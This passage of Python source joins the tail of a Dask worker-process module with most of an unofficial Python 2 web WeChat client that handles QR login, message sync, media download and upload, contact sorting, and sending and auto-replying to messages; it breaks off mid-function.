if self.on_exit is not None:
self.on_exit(r)
async def kill(self, timeout: float = 2, executor_wait: bool = True):
"""
Ensure the worker process is stopped, waiting at most
*timeout* seconds before terminating it abruptly.
"""
deadline = time() + timeout
if self.status == Status.stopped:
return
if self.status == Status.stopping:
await self.stopped.wait()
return
assert self.status in (Status.starting, Status.running)
self.status = Status.stopping
process = self.process
self.child_stop_q.put(
{
"op": "stop",
"timeout": max(0, deadline - time()) * 0.8,
"executor_wait": executor_wait,
}
)
await asyncio.sleep(0) # otherwise we get broken pipe errors
self.child_stop_q.close()
while process.is_alive() and time() < deadline:
await asyncio.sleep(0.05)
if process.is_alive():
logger.warning(
f"Worker process still alive after {timeout} seconds, killing"
)
try:
await process.terminate()
except Exception as e:
logger.error("Failed to kill worker process: %s", e)
async def _wait_until_connected(self, uid):
while True:
if self.status != Status.starting:
return
# This is a multiprocessing queue and we'd block the event loop if
# we simply called get
try:
msg = self.init_result_q.get_nowait()
except Empty:
await asyncio.sleep(self._init_msg_interval)
continue
if msg["uid"] != uid: # ensure that we didn't cross queues
continue
if "exception" in msg:
logger.error(
"Failed while trying to start worker process: %s", msg["exception"]
)
raise msg["exception"]
else:
return msg
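# _wait_until_connected polls init_result_q with get_nowait() plus a short
# sleep rather than a blocking get(), because a blocking multiprocessing
# get() would stall the event loop. The uid comparison guards against
# picking up a handshake message left over from a previous process instance.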
@classmethod
def _run(
cls,
worker_kwargs,
worker_start_args,
silence_logs,
init_result_q,
child_stop_q,
uid,
env,
config,
Worker,
): # pragma: no cover
try:
os.environ.update(env)
dask.config.set(config)
try:
from dask.multiprocessing import initialize_worker_process
except ImportError: # old Dask version
pass
else:
initialize_worker_process()
if silence_logs:
logger.setLevel(silence_logs)
IOLoop.clear_instance()
loop = IOLoop()
loop.make_current()
worker = Worker(**worker_kwargs)
async def do_stop(timeout=5, executor_wait=True):
try:
await worker.close(
report=True,
nanny=False,
safe=True, # TODO: Graceful or not?
executor_wait=executor_wait,
timeout=timeout,
)
finally:
loop.stop()
def watch_stop_q():
"""
Wait for an incoming stop message and then stop the
worker cleanly.
"""
while True:
try:
msg = child_stop_q.get(timeout=1000)
except Empty:
pass
else:
child_stop_q.close()
assert msg.pop("op") == "stop"
loop.add_callback(do_stop, **msg)
break
t = threading.Thread(target=watch_stop_q, name="Nanny stop queue watch")
t.daemon = True
t.start()
async def run():
"""
Try to start worker and inform parent of outcome.
"""
try:
await worker
except Exception as e:
logger.exception("Failed to start worker")
init_result_q.put({"uid": uid, "exception": e})
init_result_q.close()
# If we hit an exception here we need to wait for at least
# one interval for the outside to pick up this message.
# Otherwise we arrive in a race condition where the process
# cleanup wipes the queue before the exception can be
# properly handled. See also
# WorkerProcess._wait_until_connected (the 2 is for good
# measure)
sync_sleep(cls._init_msg_interval * 2)
else:
try:
assert worker.address
except ValueError:
pass
else:
init_result_q.put(
{
"address": worker.address,
"dir": worker.local_directory,
"uid": uid,
}
)
init_result_q.close()
await worker.finished()
logger.info("Worker closed")
except Exception as e:
logger.exception("Failed to initialize Worker")
init_result_q.put({"uid": uid, "exception": e})
init_result_q.close()
# If we hit an exception here we need to wait for at least one
# interval for the outside to pick up this message. Otherwise we
# arrive in a race condition where the process cleanup wipes the
# queue before the exception can be properly handled. See also
# WorkerProcess._wait_until_connected (the 2 is for good measure)
sync_sleep(cls._init_msg_interval * 2)
else:
try:
loop.run_sync(run)
except (TimeoutError, gen.TimeoutError):
# Loop was stopped before wait_until_closed() returned, ignore
pass
except KeyboardInterrupt:
# At this point the loop is not running thus we have to run
# do_stop() explicitly.
loop.run_sync(do_stop)
|
weixin.py | #!/usr/bin/env python
# coding: utf-8
import qrcode
import urllib
import urllib2
import cookielib
import requests
import xml.dom.minidom
import json
import time
import re
import sys
import os
import random
import multiprocessing
import platform
import logging
from collections import defaultdict
from urlparse import urlparse
from lxml import html
# for media upload
import mimetypes
from requests_toolbelt.multipart.encoder import MultipartEncoder
def catchKeyboardInterrupt(fn):
def wrapper(*args):
try:
return fn(*args)
except KeyboardInterrupt:
print '\n[*] 强制退出程序'
logging.debug('[*] 强制退出程序')
return wrapper
def _decode_list(data):
rv = []
for item in data:
if isinstance(item, unicode):
item = item.encode('utf-8')
elif isinstance(item, list):
item = _decode_list(item)
elif isinstance(item, dict):
item = _decode_dict(item)
rv.append(item)
return rv
def _decode_dict(data):
rv = {}
for key, value in data.iteritems():
if isinstance(key, unicode):
key = key.encode('utf-8')
if isinstance(value, unicode):
value = value.encode('utf-8')
elif isinstance(value, list):
value = _decode_list(value)
elif isinstance(value, dict):
value = _decode_dict(value)
rv[key] = value
return rv
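# _decode_list/_decode_dict are json object hooks for Python 2: json.loads
# returns unicode strings, and these helpers recursively re-encode every key
# and value to UTF-8 byte strings. They are wired in below via
#   json.loads(data, object_hook=_decode_dict)
# inside WebWeixin._post.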
class WebWeixin(object):
def __str__(self):
description = \
"=========================\n" + \
"[#] Web Weixin\n" + \
"[#] Debug Mode: " + str(self.DEBUG) + "\n" + \
"[#] Uuid: " + self.uuid + "\n" + \
"[#] Uin: " + str(self.uin) + "\n" + \
"[#] Sid: " + self.sid + "\n" + \
"[#] Skey: " + self.skey + "\n" + \
"[#] DeviceId: " + self.deviceId + "\n" + \
"[#] PassTicket: " + self.pass_ticket + "\n" + \
"========================="
return description
def __init__(self):
self.DEBUG = False
self.uuid = ''
self.base_uri = ''
self.redirect_uri = ''
self.uin = ''
self.sid = ''
self.skey = ''
self.pass_ticket = ''
self.deviceId = 'e' + repr(random.random())[2:17]
self.BaseRequest = {}
self.synckey = ''
self.SyncKey = []
self.User = []
self.MemberList = []
self.ContactList = [] # friends
self.GroupList = [] # group chats
self.GroupMemeberList = [] # group members
self.PublicUsersList = [] # official / service accounts
self.SpecialUsersList = [] # special accounts
self.autoReplyMode = True
self.syncHost = ''
self.user_agent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36'
self.interactive = False
self.autoOpen = False
self.saveFolder = os.path.join(os.getcwd(), 'saved')
self.saveSubFolders = {'webwxgeticon': 'icons', 'webwxgetheadimg': 'headimgs', 'webwxgetmsgimg': 'msgimgs',
'webwxgetvideo': 'videos', 'webwxgetvoice': 'voices', '_showQRCodeImg': 'qrcodes'}
self.appid = 'wx782c26e4c19acffb'
self.lang = 'zh_CN'
self.lastCheckTs = time.time()
self.memberCount = 0
self.SpecialUsers = ['newsapp', 'fmessage', 'filehelper', 'weibo', 'qqmail', 'fmessage', 'tmessage', 'qmessage', 'qqsync', 'floatbottle', 'lbsapp', 'shakeapp', 'medianote', 'qqfriend', 'readerapp', 'blogapp', 'facebookapp', 'masssendapp', 'meishiapp', 'feedsapp',
'voip', 'blogappweixin', 'weixin', 'brandsessionholder', 'weixinreminder', 'wxid_novlwrv3lqwv11', 'gh_22b87fa7cb3c', 'officialaccounts', 'notification_messages', 'wxid_novlwrv3lqwv11', 'gh_22b87fa7cb3c', 'wxitil', 'userexperience_alarm', 'notification_messages']
self.TimeOut = 20 # minimum sync interval (seconds)
self.media_count = -1
self.cookie = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookie))
opener.addheaders = [('User-agent', self.user_agent)]
urllib2.install_opener(opener)
def loadConfig(self, config):
if config['DEBUG']:
self.DEBUG = config['DEBUG']
if config['autoReplyMode']:
self.autoReplyMode = config['autoReplyMode']
if config['user_agent']:
self.user_agent = config['user_agent']
if config['interactive']:
self.interactive = config['interactive']
if config['autoOpen']:
self.autoOpen = config['autoOpen']
def getUUID(self):
url = 'https://login.weixin.qq.com/jslogin'
params = {
'appid': self.appid,
'fun': 'new',
'lang': self.lang,
'_': int(time.time()),
}
data = self._post(url, params, False)
regx = r'window.QRLogin.code = (\d+); window.QRLogin.uuid = "(\S+?)"'
pm = re.search(regx, data)
if pm:
code = pm.group(1)
self.uuid = pm.group(2)
return code == '200'
return False
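# getUUID hits the jslogin endpoint, whose response body looks roughly like
#   window.QRLogin.code = 200; window.QRLogin.uuid = "xxxx";
# The extracted uuid is then embedded in the login QR code
# (https://login.weixin.qq.com/l/<uuid>) rendered by genQRCode below.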
def genQRCode(self):
if sys.platform.startswith('win'):
self._showQRCodeImg()
else:
self._str2qr('https://login.weixin.qq.com/l/' + self.uuid)
def _showQRCodeImg(self):
url = 'https://login.weixin.qq.com/qrcode/' + self.uuid
params = {
't': 'webwx',
'_': int(time.time())
}
data = self._post(url, params, False)
QRCODE_PATH = self._saveFile('qrcode.jpg', data, '_showQRCodeImg')
os.startfile(QRCODE_PATH)
def waitForLogin(self, tip=1):
time.sleep(tip)
url = 'https://login.weixin.qq.com/cgi-bin/mmwebwx-bin/login?tip=%s&uuid=%s&_=%s' % (
tip, self.uuid, int(time.time()))
data = self._get(url)
pm = re.search(r'window.code=(\d+);', data)
code = pm.group(1)
if code == '201':
return True
elif code == '200':
pm = re.search(r'window.redirect_uri="(\S+?)";', data)
r_uri = pm.group(1) + '&fun=new'
self.redirect_uri = r_uri
self.base_uri = r_uri[:r_uri.rfind('/')]
return True
elif code == '408':
self._echo('[登陆超时] \n')
else:
self._echo('[登陆异常] \n')
return False
def login(self):
data = self._get(self.redirect_uri)
doc = xml.dom.minidom.parseString(data)
root = doc.documentElement
for node in root.childNodes:
if node.nodeName == 'skey':
self.skey = node.childNodes[0].data
elif node.nodeName == 'wxsid':
self.sid = node.childNodes[0].data
elif node.nodeName == 'wxuin':
self.uin = node.childNodes[0].data
elif node.nodeName == 'pass_ticket':
self.pass_ticket = node.childNodes[0].data
if '' in (self.skey, self.sid, self.uin, self.pass_ticket):
return False
self.BaseRequest = {
'Uin': int(self.uin),
'Sid': self.sid,
'Skey': self.skey,
'DeviceID': self.deviceId,
}
return True
def webwxinit(self):
url = self.base_uri + '/webwxinit?pass_ticket=%s&skey=%s&r=%s' % (
self.pass_ticket, self.skey, int(time.time()))
params = {
'BaseRequest': self.BaseRequest
}
dic = self._post(url, params)
self.SyncKey = dic['SyncKey']
self.User = dic['User']
# synckey for synccheck
self.synckey = '|'.join(
[str(keyVal['Key']) + '_' + str(keyVal['Val']) for keyVal in self.SyncKey['List']])
return dic['BaseResponse']['Ret'] == 0
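# webwxinit returns the initial SyncKey structure (its 'List' holds Key/Val
# pairs); self.synckey flattens it into the "Key_Val|Key_Val|..." string
# format expected by the synccheck long-poll endpoint.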
def webwxstatusnotify(self):
url = self.base_uri + \
'/webwxstatusnotify?lang=zh_CN&pass_ticket=%s' % (self.pass_ticket)
params = {
'BaseRequest': self.BaseRequest,
"Code": 3,
"FromUserName": self.User['UserName'],
"ToUserName": self.User['UserName'],
"ClientMsgId": int(time.time())
}
dic = self._post(url, params)
return dic['BaseResponse']['Ret'] == 0
def webwxgetcontact(self):
SpecialUsers = self.SpecialUsers
print self.base_uri
url = self.base_uri + '/webwxgetcontact?pass_ticket=%s&skey=%s&r=%s' % (
self.pass_ticket, self.skey, int(time.time()))
dic = self._post(url, {})
self.MemberCount = dic['MemberCount']
self.MemberList = dic['MemberList']
ContactList = self.MemberList[:]
GroupList = self.GroupList[:]
PublicUsersList = self.PublicUsersList[:]
SpecialUsersList = self.SpecialUsersList[:]
for i in xrange(len(ContactList) - 1, -1, -1):
Contact = ContactList[i]
if Contact['VerifyFlag'] & 8 != 0: # official / service account
ContactList.remove(Contact)
self.PublicUsersList.append(Contact)
elif Contact['UserName'] in SpecialUsers: # special account
ContactList.remove(Contact)
self.SpecialUsersList.append(Contact)
elif Contact['UserName'].find('@@') != -1: # group chat
ContactList.remove(Contact)
self.GroupList.append(Contact)
elif Contact['UserName'] == self.User['UserName']: # self (own account)
ContactList.remove(Contact)
self.ContactList = ContactList
return True
def webwxbatchgetcontact(self):
url = self.base_uri + \
'/webwxbatchgetcontact?type=ex&r=%s&pass_ticket=%s' % (
int(time.time()), self.pass_ticket)
params = {
'BaseRequest': self.BaseRequest,
"Count": len(self.GroupList),
"List": [{"UserName": g['UserName'], "EncryChatRoomId":""} for g in self.GroupList]
}
dic = self._post(url, params)
# blabla ...
ContactList = dic['ContactList']
ContactCount = dic['Count']
self.GroupList = ContactList
for i in xrange(len(ContactList) - 1, -1, -1):
Contact = ContactList[i]
MemberList = Contact['MemberList']
for member in MemberList:
self.GroupMemeberList.append(member)
return True
def getNameById(self, id):
url = self.base_uri + \
'/webwxbatchgetcontact?type=ex&r=%s&pass_ticket=%s' % (
int(time.time()), self.pass_ticket)
params = {
'BaseRequest': self.BaseRequest,
"Count": 1,
"List": [{"UserName": id, "EncryChatRoomId": ""}]
}
dic = self._post(url, params)
# blabla ...
return dic['ContactList']
def testsynccheck(self):
SyncHost = [
'webpush.weixin.qq.com',
'webpush2.weixin.qq.com',
'webpush.wechat.com',
'webpush1.wechat.com',
'webpush2.wechat.com',
'webpush1.wechatapp.com',
# 'webpush.wechatapp.com'
]
for host in SyncHost:
self.syncHost = host
[retcode, selector] = self.synccheck()
if retcode == '0':
return True
return False
def synccheck(self):
params = {
'r': int(time.time()),
'sid': self.sid,
'uin': self.uin,
'skey': self.skey,
'deviceid': self.deviceId,
'synckey': self.synckey,
'_': int(time.time()),
}
url = 'https://' + self.syncHost + \
'/cgi-bin/mmwebwx-bin/synccheck?' + urllib.urlencode(params)
data = self._get(url)
pm = re.search(
r'window.synccheck={retcode:"(\d+)",selector:"(\d+)"}', data)
retcode = pm.group(1)
selector = pm.group(2)
return [retcode, selector]
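# synccheck is a long poll against the selected sync host. Return codes as
# handled in listenMsgMode below: retcode 1100 (logged out on the phone),
# 1101 (logged in elsewhere on web), 0 (OK); selector 2 means new messages,
# 6 looks like a red-packet hint, 7 means activity on the phone, 0 means idle.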
def webwxsync(self):
url = self.base_uri + \
'/webwxsync?sid=%s&skey=%s&pass_ticket=%s' % (
self.sid, self.skey, self.pass_ticket)
params = {
'BaseRequest': self.BaseRequest,
'SyncKey': self.SyncKey,
'rr': ~int(time.time())
}
dic = self._post(url, params)
if self.DEBUG:
print json.dumps(dic, indent=4)
logging.debug(json.dumps(dic, indent=4))
if dic['BaseResponse']['Ret'] == 0:
self.SyncKey = dic['SyncKey']
self.synckey = '|'.join(
[str(keyVal['Key']) + '_' + str(keyVal['Val']) for keyVal in self.SyncKey['List']])
return dic
def webwxsendmsg(self, word, to='filehelper'):
url = self.base_uri + \
'/webwxsendmsg?pass_ticket=%s' % (self.pass_ticket)
clientMsgId = str(int(time.time() * 1000)) + \
str(random.random())[:5].replace('.', '')
params = {
'BaseRequest': self.BaseRequest,
'Msg': {
"Type": 1,
"Content": self._transcoding(word),
"FromUserName": self.User['UserName'],
"ToUserName": to,
"LocalID": clientMsgId,
"ClientMsgId": clientMsgId
}
}
headers = {'content-type': 'application/json; charset=UTF-8'}
data = json.dumps(params, ensure_ascii=False).encode('utf8')
r = requests.post(url, data=data, headers=headers)
dic = r.json()
return dic['BaseResponse']['Ret'] == 0
def webwxuploadmedia(self, image_name):
url = 'https://file2.wx.qq.com/cgi-bin/mmwebwx-bin/webwxuploadmedia?f=json'
# counter
self.media_count = self.media_count + 1
# file name
file_name = image_name
# MIME type
# mime_type = application/pdf, image/jpeg, image/png, etc.
mime_type = mimetypes.guess_type(image_name, strict=False)[0]
# Document type as understood by WeChat; the server appears to accept only
# two kinds: 'pic' (shown inline) and 'doc' (shown as a file attachment).
media_type = 'pic' if mime_type.split('/')[0] == 'image' else 'doc'
# last modified date
lastModifieDate = 'Thu Mar 17 2016 00:55:10 GMT+0800 (CST)'
# file size
file_size = os.path.getsize(file_name)
# PassTicket
pass_ticket = self.pass_ticket
# clientMediaId
client_media_id = str(int(time.time() * 1000)) + \
str(random.random())[:5].replace('.', '')
# webwx_data_ticket
webwx_data_ticket = ''
for item in self.cookie:
if item.name == 'webwx_data_ticket':
webwx_data_ticket = item.value
break
if (webwx_data_ticket == ''):
return "None Fuck Cookie"
uploadmediarequest = json.dumps({
"BaseRequest": self.BaseRequest,
"ClientMediaId": client_media_id,
"TotalLen": file_size,
"StartPos": 0,
"DataLen": file_size,
"MediaType": 4
}, ensure_ascii=False).encode('utf8')
multipart_encoder = MultipartEncoder(
fields={
'id': 'WU_FILE_' + str(self.media_count),
'name': file_name,
'type': mime_type,
'lastModifieDate': lastModifieDate,
'size': str(file_size),
'mediatype': media_type,
'uploadmediarequest': uploadmediarequest,
'webwx_data_ticket': webwx_data_ticket,
'pass_ticket': pass_ticket,
'filename': (file_name, open(file_name, 'rb'), mime_type.split('/')[1])
},
boundary='-----------------------------1575017231431605357584454111'
)
headers = {
'Host': 'file2.wx.qq.com',
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:42.0) Gecko/20100101 Firefox/42.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Referer': 'https://wx2.qq.com/',
'Content-Type': multipart_encoder.content_type,
'Origin': 'https://wx2.qq.com',
'Connection': 'keep-alive',
'Pragma': 'no-cache',
'Cache-Control': 'no-cache'
}
r = requests.post(url, data=multipart_encoder, headers=headers)
response_json = r.json()
if response_json['BaseResponse']['Ret'] == 0:
return response_json
return None
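# Upload flow: webwxuploadmedia posts the file as multipart/form-data
# (including the webwx_data_ticket cookie value and an uploadmediarequest
# JSON blob) and, on success, returns the response whose MediaId is later
# passed to webwxsendmsgimg / webwxsendmsgemotion to actually deliver the media.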
def webwxsendmsgimg(self, user_id, media_id):
url = 'https://wx2.qq.com/cgi-bin/mmwebwx-bin/webwxsendmsgimg?fun=async&f=json&pass_ticket=%s' % self.pass_ticket
clientMsgId = str(int(time.time() * 1000)) + \
str(random.random())[:5].replace('.', '')
data_json = {
"BaseRequest": self.BaseRequest,
"Msg": {
"Type": 3,
"MediaId": media_id,
"FromUserName": self.User['UserName'],
"ToUserName": user_id,
"LocalID": clientMsgId,
"ClientMsgId": clientMsgId
}
}
headers = {'content-type': 'application/json; charset=UTF-8'}
data = json.dumps(data_json, ensure_ascii=False).encode('utf8')
r = requests.post(url, data=data, headers=headers)
dic = r.json()
return dic['BaseResponse']['Ret'] == 0
def webwxsendmsgemotion(self, user_id, media_id):
url = 'https://wx2.qq.com/cgi-bin/mmwebwx-bin/webwxsendemoticon?fun=sys&f=json&pass_ticket=%s' % self.pass_ticket
clientMsgId = str(int(time.time() * 1000)) + \
str(random.random())[:5].replace('.', '')
data_json = {
"BaseRequest": self.BaseRequest,
"Msg": {
"Type": 47,
"EmojiFlag": 2,
"MediaId": media_id,
"FromUserName": self.User['UserName'],
"ToUserName": user_id,
"LocalID": clientMsgId,
"ClientMsgId": clientMsgId
}
}
headers = {'content-type': 'application/json; charset=UTF-8'}
data = json.dumps(data_json, ensure_ascii=False).encode('utf8')
r = requests.post(url, data=data, headers=headers)
dic = r.json()
if self.DEBUG:
print json.dumps(dic, indent=4)
logging.debug(json.dumps(dic, indent=4))
return dic['BaseResponse']['Ret'] == 0
def _saveFile(self, filename, data, api=None):
fn = filename
if self.saveSubFolders[api]:
dirName = os.path.join(self.saveFolder, self.saveSubFolders[api])
if not os.path.exists(dirName):
os.makedirs(dirName)
fn = os.path.join(dirName, filename)
logging.debug('Saved file: %s' % fn)
with open(fn, 'wb') as f:
f.write(data)
f.close()
return fn
def webwxgeticon(self, id):
url = self.base_uri + \
'/webwxgeticon?username=%s&skey=%s' % (id, self.skey)
data = self._get(url)
fn = 'img_' + id + '.jpg'
return self._saveFile(fn, data, 'webwxgeticon')
def webwxgetheadimg(self, id):
url = self.base_uri + \
'/webwxgetheadimg?username=%s&skey=%s' % (id, self.skey)
data = self._get(url)
fn = 'img_' + id + '.jpg'
return self._saveFile(fn, data, 'webwxgetheadimg')
def webwxgetmsgimg(self, msgid):
url = self.base_uri + \
'/webwxgetmsgimg?MsgID=%s&skey=%s' % (msgid, self.skey)
data = self._get(url)
fn = 'img_' + msgid + '.jpg'
return self._saveFile(fn, data, 'webwxgetmsgimg')
# Not working for now because weixin does not support this API
def webwxgetvideo(self, msgid):
url = self.base_uri + \
'/webwxgetvideo?msgid=%s&skey=%s' % (msgid, self.skey)
data = self._get(url, api='webwxgetvideo')
fn = 'video_' + msgid + '.mp4'
return self._saveFile(fn, data, 'webwxgetvideo')
def webwxgetvoice(self, msgid):
url = self.base_uri + \
'/webwxgetvoice?msgid=%s&skey=%s' % (msgid, self.skey)
data = self._get(url)
fn = 'voice_' + msgid + '.mp3'
return self._saveFile(fn, data, 'webwxgetvoice')
def getGroupName(self, id):
name = '未知群'
for member in self.GroupList:
if member['UserName'] == id:
name = member['NickName']
if name == '未知群':
# not found among the groups we already know; look it up by id
GroupList = self.getNameById(id)
for group in GroupList:
self.GroupList.append(group)
if group['UserName'] == id:
name = group['NickName']
MemberList = group['MemberList']
for member in MemberList:
self.GroupMemeberList.append(member)
return name
def getUserRemarkName(self, id):
name = '未知群' if id[:2] == '@@' else '陌生人'
if id == self.User['UserName']:
return self.User['NickName'] # self (own account)
if id[:2] == '@@':
# group chat
name = self.getGroupName(id)
else:
# special accounts
for member in self.SpecialUsersList:
if member['UserName'] == id:
name = member['RemarkName'] if member[
'RemarkName'] else member['NickName']
# official or service accounts
for member in self.PublicUsersList:
if member['UserName'] == id:
name = member['RemarkName'] if member[
'RemarkName'] else member['NickName']
# direct contacts
for member in self.ContactList:
if member['UserName'] == id:
name = member['RemarkName'] if member[
'RemarkName'] else member['NickName']
# group members
for member in self.GroupMemeberList:
if member['UserName'] == id:
name = member['DisplayName'] if member[
'DisplayName'] else member['NickName']
if name == '未知群' or name == '陌生人':
logging.debug(id)
return name
def getUSerID(self, name):
for member in self.MemberList:
if name == member['RemarkName'] or name == member['NickName']:
return member['UserName']
return None
def _showMsg(self, message):
srcName = None
dstName = None
groupName = None
content = None
msg = message
logging.debug(msg)
if msg['raw_msg']:
srcName = self.getUserRemarkName(msg['raw_msg']['FromUserName'])
dstName = self.getUserRemarkName(msg['raw_msg']['ToUserName'])
content = msg['raw_msg']['Content'].replace(
'&lt;', '<').replace('&gt;', '>')
message_id = msg['raw_msg']['MsgId']
if content.find('http://weixin.qq.com/cgi-bin/redirectforward?args=') != -1:
# location (geo) message
data = self._get(content).decode('gbk').encode('utf-8')
pos = self._searchContent('title', data, 'xml')
tree = html.fromstring(self._get(content))
url = tree.xpath('//html/body/div/img')[0].attrib['src']
for item in urlparse(url).query.split('&'):
if item.split('=')[0] == 'center':
loc = item.split('=')[-1:]
content = '%s 发送了一个 位置消息 - 我在 [%s](%s) @ %s]' % (
srcName, pos, url, loc)
if msg['raw_msg']['ToUserName'] == 'filehelper':
# file transfer helper (filehelper)
dstName = '文件传输助手'
if msg['raw_msg']['FromUserName'][:2] == '@@':
# message received from a group chat
if re.search(":<br/>", content, re.IGNORECASE):
[people, content] = content.split(':<br/>')
groupName = srcName
srcName = self.getUserRemarkName(people)
dstName = 'GROUP'
else:
groupName = srcName
srcName = 'SYSTEM'
elif msg['raw_msg']['ToUserName'][:2] == '@@':
# message we sent to a group chat ourselves
groupName = dstName
dstName = 'GROUP'
# received a red packet
if content == '收到红包,请在手机上查看':
msg['message'] = content
# an explicit message text was provided
if 'message' in msg.keys():
content = msg['message']
if groupName != None:
print '%s |%s| %s -> %s: %s' % (message_id, groupName.strip(), srcName.strip(), dstName.strip(), content.replace('<br/>', '\n'))
logging.info('%s |%s| %s -> %s: %s' % (message_id, groupName.strip(),
srcName.strip(), dstName.strip(), content.replace('<br/>', '\n')))
else:
print '%s %s -> %s: %s' % (message_id, srcName.strip(), dstName.strip(), content.replace('<br/>', '\n'))
logging.info('%s %s -> %s: %s' % (message_id, srcName.strip(),
dstName.strip(), content.replace('<br/>', '\n')))
def handleMsg(self, r):
for msg in r['AddMsgList']:
print '[*] 你有新的消息,请注意查收'
logging.debug('[*] 你有新的消息,请注意查收')
if self.DEBUG:
fn = 'msg' + str(int(random.random() * 1000)) + '.json'
with open(fn, 'w') as f:
f.write(json.dumps(msg))
print '[*] 该消息已储存到文件: ' + fn
logging.debug('[*] 该消息已储存到文件: %s' % (fn))
msgType = msg['MsgType']
name = self.getUserRemarkName(msg['FromUserName'])
content = msg['Content'].replace('&lt;', '<').replace('&gt;', '>')
msgid = msg['MsgId']
if msgType == 1:
raw_msg = {'raw_msg': msg}
self._showMsg(raw_msg)
if self.autoReplyMode:
ans = content + '\n[微信机器人自动回复]'
if self.webwxsendmsg(ans, msg['FromUserName']):
print '自动回复: ' + ans
logging.info('自动回复: ' + ans)
else:
print '自动回复失败'
logging.info('自动回复失败')
elif msgType == 3:
image = self.webwxgetmsgimg(msgid)
raw_msg = {'raw_msg': msg,
'message': '%s 发送了一张图片: %s' % (name, image)}
self._showMsg(raw_msg)
self._safe_open(image)
elif msgType == 34:
voice = self.webwxgetvoice(msgid)
raw_msg = {'raw_msg': msg,
'message': '%s 发了一段语音: %s' % (name, voice)}
self._showMsg(raw_msg)
self._safe_open(voice)
elif msgType == 42:
info = msg['RecommendInfo']
print '%s 发送了一张名片:' % name
print '========================='
print '= 昵称: %s' % info['NickName']
print '= 微信号: %s' % info['Alias']
print '= 地区: %s %s' % (info['Province'], info['City'])
print '= 性别: %s' % ['未知', '男', '女'][info['Sex']]
print '========================='
raw_msg = {'raw_msg': msg, 'message': '%s 发送了一张名片: %s' % (
name.strip(), json.dumps(info))}
self._showMsg(raw_msg)
elif msgType == 47:
url = self._searchContent('cdnurl', content)
raw_msg = {'raw_msg': msg,
'message': '%s 发了一个动画表情,点击下面链接查看: %s' % (name, url)}
self._showMsg(raw_msg)
self._safe_open(url)
elif msgType == 49:
appMsgType = defaultdict(lambda: "")
appMsgType.update({5: '链接', 3: '音乐', 7: '微博'})
print '%s 分享了一个%s:' % (name, appMsgType[msg['AppMsgType']])
print '========================='
print '= 标题: %s' % msg['FileName']
print '= 描述: %s' % self._searchContent('des', content, 'xml')
print '= 链接: %s' % msg['Url']
print '= 来自: %s' % self._searchContent('appname', content, 'xml')
print '========================='
card = {
'title': msg['FileName'],
'description': self._searchContent('des', content, 'xml'),
'url': msg['Url'],
'appname': self._searchContent('appname', content, 'xml')
}
raw_msg = {'raw_msg': msg, 'message': '%s 分享了一个%s: %s' % (
name, appMsgType[msg['AppMsgType']], json.dumps(card))}
self._showMsg(raw_msg)
elif msgType == 51:
raw_msg = {'raw_msg': msg, 'message': '[*] 成功获取联系人信息'}
self._showMsg(raw_msg)
elif msgType == 62:
video = self.webwxgetvideo(msgid)
raw_msg = {'raw_msg': msg,
'message': '%s 发了一段小视频: %s' % (name, video)}
self._showMsg(raw_msg)
self._safe_open(video)
elif msgType == 10002:
raw_msg = {'raw_msg': msg, 'message': '%s 撤回了一条消息' % name}
self._showMsg(raw_msg)
else:
logging.debug('[*] 该消息类型为: %d,可能是表情,图片, 链接或红包: %s' %
(msg['MsgType'], json.dumps(msg)))
raw_msg = {
'raw_msg': msg, 'message': '[*] 该消息类型为: %d,可能是表情,图片, 链接或红包' % msg['MsgType']}
self._showMsg(raw_msg)
def listenMsgMode(self):
print '[*] 进入消息监听模式 ... 成功'
logging.debug('[*] 进入消息监听模式 ... 成功')
self._run('[*] 进行同步线路测试 ... ', self.testsynccheck)
playWeChat = 0
redEnvelope = 0
while True:
self.lastCheckTs = time.time()
[retcode, selector] = self.synccheck()
if self.DEBUG:
print 'retcode: %s, selector: %s' % (retcode, selector)
logging.debug('retcode: %s, selector: %s' % (retcode, selector))
if retcode == '1100':
print '[*] 你在手机上登出了微信,债见'
logging.debug('[*] 你在手机上登出了微信,债见')
break
if retcode == '1101':
print '[*] 你在其他地方登录了 WEB 版微信,债见'
logging.debug('[*] 你在其他地方登录了 WEB 版微信,债见')
break
elif retcode == '0':
if selector == '2':
r = self.webwxsync()
if r is not None:
self.handleMsg(r)
elif selector == '6':
# TODO
redEnvelope += 1
print '[*] 收到疑似红包消息 %d 次' % redEnvelope
logging.debug('[*] 收到疑似红包消息 %d 次' % redEnvelope)
elif selector == '7':
playWeChat += 1
print '[*] 你在手机上玩微信被我发现了 %d 次' % playWeChat
logging.debug('[*] 你在手机上玩微信被我发现了 %d 次' % playWeChat)
r = self.webwxsync()
elif selector == '0':
time.sleep(1)
if (time.time() - self.lastCheckTs) <= 20:
time.sleep(time.time() - self.lastCheckTs)
def sendMsg(self, name, word, isfile=False):
id = self.getUSerID(name)
if id:
if isfile:
with open(word, 'r') as f:
for line in f.readlines():
line = line.replace('\n', '')
self._echo('-> ' + name + ': ' + line)
if self.webwxsendmsg(line, id):
print ' [成功]'
else:
print ' [失败]'
time.sleep(1)
else:
if self.webwxsendmsg(word, id):
print '[*] 消息发送成功'
logging.debug('[*] 消息发送成功')
else:
print '[*] 消息发送失败'
logging.debug('[*] 消息发送失败')
else:
print '[*] 此用户不存在'
logging.debug('[*] 此用户不存在')
def sendMsgToAll(self, word):
for contact in self.ContactList:
name = contact['RemarkName'] if contact[
'RemarkName'] else contact['NickName']
id = contact['UserName']
self._echo('-> ' + name + ': ' + word)
if self.webwxsendmsg(word, id):
print ' [成功]'
else:
print ' [失败]'
time.sleep(1)
def sendImg(self, name, file_name):
response = self.webwxuploadmedia(file_name)
media_id = ""
if response is not None:
media_id = response['MediaId']
user_id = self.getUSerID(name)
response = self.webwxsendmsgimg(user_id, media_id)
def sendEmotion(self, name, file_name):
response = self.webwxuploadmedia(file_name)
media_id = ""
if response is not None:
media_id = response['MediaId']
user_id = self.getUSerID(name)
response = self.webwxsendmsgemotion(user_id, media_id)
@catchKeyboardInterrupt
def start(self):
self._echo('[*] 微信网页版 ... 开动')
print
logging.debug('[*] 微信网页版 ... 开动')
while True:
self._run('[*] 正在获取 uuid ... ', self.getUUID)
self._echo('[*] 正在获取二维码 ... 成功')
print
